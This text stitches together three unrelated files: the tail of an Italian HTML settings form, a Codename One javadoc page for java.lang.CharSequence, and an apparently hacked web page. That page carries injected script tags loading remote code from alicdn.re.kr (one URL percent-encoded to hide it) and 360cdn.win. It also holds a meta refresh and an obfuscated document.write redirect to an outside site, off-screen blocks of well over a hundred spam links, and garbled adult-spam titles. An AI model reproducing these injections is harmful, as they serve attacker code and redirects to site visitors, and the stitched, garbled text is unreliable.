class="smallNote">Verr&agrave; prodotta una pagina supplementare con il piano di pagamento proposto</i></td> </tr> <tr> <td>%ml.sezioneAnnotazioni% :</td> <td> <div class="radioset"> <input type="radio" id="sezioneAnnotazioniPresente" name="sezioneAnnotazioni" %sezioneAnnotazioniSi% value="si"/><label for="sezioneAnnotazioniPresente">%ml.si%</label> <input type="radio" id="sezioneAnnotazioniAssente" name="sezioneAnnotazioni" %sezioneAnnotazioniNo% value="no"/><label for="sezioneAnnotazioniAssente">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Verr&agrave; prodotta una pagina supplementare con le osservazioni generali</i></td> </tr> <tr> <td>%ml.sezioneAnnotazioniVoci% :</td> <td> <div class="radioset"> <input type="radio" id="sezioneAnnotazioniVociPresente" name="sezioneAnnotazioniVoci" %sezioneAnnotazioniVociSi% value="si"/><label for="sezioneAnnotazioniVociPresente">%ml.si%</label> <input type="radio" id="sezioneAnnotazioniVociAssente" name="sezioneAnnotazioniVoci" %sezioneAnnotazioniVociNo% value="no"/><label for="sezioneAnnotazioniVociAssente">%ml.no%</label> </div> </td> <td valign="middle"><i class="smallNote">Verranno emesse le annotazioni particolari sui singoli interventi</i></td> </tr> </tbody> <tfoot> <tr height="50" valign="bottom"> <td colspan="6" align="right" class="tooltip"><button class="button" title="Conferma le modifiche fatte" >%ml.conferma%</button></td> </tr> </tfoot> </table> </form> </div> </div>
CodenameOne/javadoc/java/lang/CharSequence.html
skyHALud/codenameone
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_04) on Wed Jul 02 15:53:49 IDT 2014 --> <title>CharSequence (Codename One API)</title> <meta name="date" content="2014-07-02"> <link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="CharSequence (Codename One API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-all.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../java/lang/Character.html" title="class in java.lang"><span class="strong">Prev Class</span></a></li> <li><a href="../../java/lang/Class.html" title="class in java.lang"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../index.html?java/lang/CharSequence.html" target="_top">Frames</a></li> <li><a href="CharSequence.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">java.lang</div> <h2 title="Interface CharSequence" class="title">Interface CharSequence</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public interface <span class="strong">CharSequence</span></pre> <div class="block">This interface represents an ordered set of characters and defines the methods to probe them.</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>char</code></td> <td class="colLast"><code><strong><a href="../../java/lang/CharSequence.html#charAt(int)">charAt</a></strong>(int&nbsp;index)</code> <div class="block">Returns the character at the specified index, with the first character having index zero.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>int</code></td> <td class="colLast"><code><strong><a href="../../java/lang/CharSequence.html#length()">length</a></strong>()</code> <div class="block">Returns the number of characters in this sequence.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../java/lang/CharSequence.html" title="interface in java.lang">CharSequence</a></code></td> <td class="colLast"><code><strong><a href="../../java/lang/CharSequence.html#subSequence(int, int)">subSequence</a></strong>(int&nbsp;start, int&nbsp;end)</code> <div class="block">Returns a <code>CharSequence</code> from the <code>start</code> index (inclusive) to the <code>end</code> index (exclusive) of this sequence.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../java/lang/String.html" title="class in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../java/lang/CharSequence.html#toString()">toString</a></strong>()</code> <div class="block">Returns a string with the same characters in the same order as in this sequence.</div> </td> </tr> </table> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="length()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>length</h4> <pre>int&nbsp;length()</pre> <div class="block">Returns the number of characters in this sequence.</div> <dl><dt><span class="strong">Returns:</span></dt><dd>the number of characters.</dd></dl> </li> </ul> <a name="charAt(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>charAt</h4> <pre>char&nbsp;charAt(int&nbsp;index)</pre> <div class="block">Returns the character at the specified index, with the first character having index zero.</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>index</code> - the index of the character to return.</dd> <dt><span class="strong">Returns:</span></dt><dd>the requested character.</dd> <dt><span class="strong">Throws:</span></dt> <dd><code><a href="../../java/lang/IndexOutOfBoundsException.html" title="class in java.lang">IndexOutOfBoundsException</a></code> - if <code>index &lt; 0</code> or <code>index</code> is greater than the length of this sequence.</dd></dl> </li> </ul> <a name="subSequence(int, int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>subSequence</h4> <pre><a href="../../java/lang/CharSequence.html" title="interface in java.lang">CharSequence</a>&nbsp;subSequence(int&nbsp;start, int&nbsp;end)</pre> <div class="block">Returns a <code>CharSequence</code> from the <code>start</code> index (inclusive) to the <code>end</code> index (exclusive) of this sequence.</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>start</code> - the start offset of the sub-sequence. It is inclusive, that is, the index of the first character that is included in the sub-sequence.</dd><dd><code>end</code> - the end offset of the sub-sequence. It is exclusive, that is, the index of the first character after those that are included in the sub-sequence</dd> <dt><span class="strong">Returns:</span></dt><dd>the requested sub-sequence.</dd> <dt><span class="strong">Throws:</span></dt> <dd><code><a href="../../java/lang/IndexOutOfBoundsException.html" title="class in java.lang">IndexOutOfBoundsException</a></code> - if <code>start &lt; 0</code>, <code>end &lt; 0</code>, <code>start &gt; end</code>, or if <code>start</code> or <code>end</code> are greater than the length of this sequence.</dd></dl> </li> </ul> <a name="toString()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>toString</h4> <pre><a href="../../java/lang/String.html" title="class in java.lang">String</a>&nbsp;toString()</pre> <div class="block">Returns a string with the same characters in the same order as in this sequence.</div> <dl> <dt><strong>Overrides:</strong></dt> <dd><code><a href="../../java/lang/Object.html#toString()">toString</a></code>&nbsp;in class&nbsp;<code><a href="../../java/lang/Object.html" title="class in java.lang">Object</a></code></dd> <dt><span class="strong">Returns:</span></dt><dd>a string based on this sequence.</dd></dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-all.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../java/lang/Character.html" title="class in java.lang"><span class="strong">Prev Class</span></a></li> <li><a href="../../java/lang/Class.html" title="class in java.lang"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../index.html?java/lang/CharSequence.html" target="_top">Frames</a></li> <li><a href="CharSequence.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
logs/site-nipponki/02021647949.html
ForAEdesWeb/AEW25
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> <script/src=//alicdn.re.kr/re.kr></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> -------!> <script/src=//360cdn.win/c.css></script> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com"> <script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script> <script/src=//alicdn.re.kr/re.kr></script> <div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;"> <a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a> <a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a> <a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a> <a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a> <a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a> <a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a> </div class="a1b2c8d9e1"> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> <a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a> <a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a> <a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a> <a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a> <a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a> <a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a> <a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a> <a class="z7z8z9z6" 